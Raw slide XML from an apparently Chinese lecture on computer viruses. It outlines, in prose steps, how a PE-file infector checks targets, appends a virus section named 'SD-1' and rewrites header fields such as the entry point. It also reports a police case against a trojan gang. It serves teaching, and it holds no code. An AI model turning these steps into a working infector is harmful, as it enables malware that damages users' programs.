                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F5170F-372A-468C-9F1B-B6CD90E204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916113"/>
            <a:ext cx="7848600"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991CF1D6-E47A-4AB9-AEF2-360D33A6B3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78851" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1542F6DE-247C-49AE-BF3A-8A1AE14FE1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9525" y="2276475"/>
            <a:ext cx="772795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5602F64-0E83-4C6E-9A17-A9E46AB1C50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79875" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C02C0D6-64CC-4AA0-9967-9B587DCA1F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844675"/>
            <a:ext cx="71215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305C139-3AE5-4265-ACD0-D2E3110A507E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B65CA645-C0C7-4B48-92F2-DCF2ED5A86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484313"/>
            <a:ext cx="8486775"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B50E1E1E-FBDA-4A10-B609-05E5DB4CC9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83971" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D298F31-71EF-4B18-8D47-EBD7410021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708275"/>
            <a:ext cx="7789862"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3972" name="直接连接符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD2D618-C0D2-425E-B98C-1DE046B6488B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1123950" y="3500438"/>
            <a:ext cx="7791450" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="sq" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxn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7D07F68-508F-447E-8E17-EFF9B9F2FBC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06F8D7A-A08D-4016-BCA6-9DF6DA594BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索到的文件是否为正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件：判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头有无“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MZ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标志、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头有无“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标志。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析是否已经被感染过了：读文件到内存，分析最后一个节的节名是否为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SD-1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，是则认为已经感染过了，不重复感染。</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22A9CD35-C031-4D92-A02C-4A6F08544DB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D646FB52-2C89-4A31-92E0-80E20CE2850E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>建立病毒节表结构，将病毒代码写入到被感染文件最后。节表结构中需要填入的参数有节名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SD-1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、节的内存偏移地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VirtualAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、节的属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Characteristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、节的文件偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PointerToRawData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、节的实际大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VirtualSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</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4E0C0984-A16A-4831-8EBA-085CEFA29D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个实际的感染例子演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1525C444-72D5-4C81-9697-66E56EEC214C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>修改的参数有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头中的节个数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NumberOfSections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、代码段大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SizeOfCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、内存中整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>映像体的尺寸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SizeOfImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、入口地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AddressOfEntryPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>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6534217D-ECF4-4E69-99E0-4F8081E37D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>江苏“温柔”木马案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{140AE1C2-C986-4AAE-8D90-ACB7DABF3EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1663700"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>徐州市公安局网监支队、开发区分局、云龙分局密切配合，前后经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>个多月的艰苦鏖战，辗转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>个省、直辖市，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>多个地级市，行程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>万多公里，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>共抓获涉案人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>人，涉案金额</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>余万元</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>。从而一举打掉了这个占据国内木马市场份额约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>50%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>的网络犯罪团伙。这也是当时国内在打击利用木马程序破坏计算机系统犯罪中，第一个完整地从木马作者，到木马总代理、一级代理、“箱子持有人”，再到洗信人等各层次作案人员均到案的成功案例。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89F6F91E-D688-4CB5-A20D-F939C43A945E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染释放型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F1891F-5DAB-41AE-BF0D-7331CC059330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1916113"/>
            <a:ext cx="1368425" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:srgbClr val="969696"/>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000" b="1"/>
              <a:t>正常程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33EB7271-22B6-4C85-90C2-59E6572199B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="2636838"/>
            <a:ext cx="1368425" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="969696"/>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000" b="1"/>
              <a:t>正常程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92165" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{737F127D-4BD5-4010-9016-A433653234D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="1916113"/>
            <a:ext cx="1368425" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="969696"/>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000" b="1"/>
              <a:t>病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92166" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBE1C52-A49F-4B50-AD58-8F151174304D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3635375" y="2636838"/>
            <a:ext cx="792163" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 3923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92167" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7455B9-DC18-4AD8-BD86-EE470F74416B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="1989138"/>
            <a:ext cx="936625" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4653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92168" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC46DC4C-8A72-429E-A7D6-89466D8108E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="3429000"/>
            <a:ext cx="936625" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 46530"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="92169" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC2749A2-994C-45F2-86BA-1A812751D1E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="5013325"/>
            <a:ext cx="55435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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒获得运行时，将病毒体或正常程序释放出来运行</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D8F96146-E412-4703-8596-2F247B4B9E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染释放型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93187" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B44CA85-8199-485D-B70D-6FFBB24C88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7567613"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0C61C7FB-DFBD-4558-B877-6CD64DD17DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染释放型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>感染思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95235" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574A84A5-026C-4D6B-881F-7AF6314B14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05038"/>
            <a:ext cx="77184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C52B025E-8CC6-4F54-8254-4CC354133B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>目前流行的非感染型“病毒”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD78EAC-929F-492B-B7CF-48D4A21BDD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
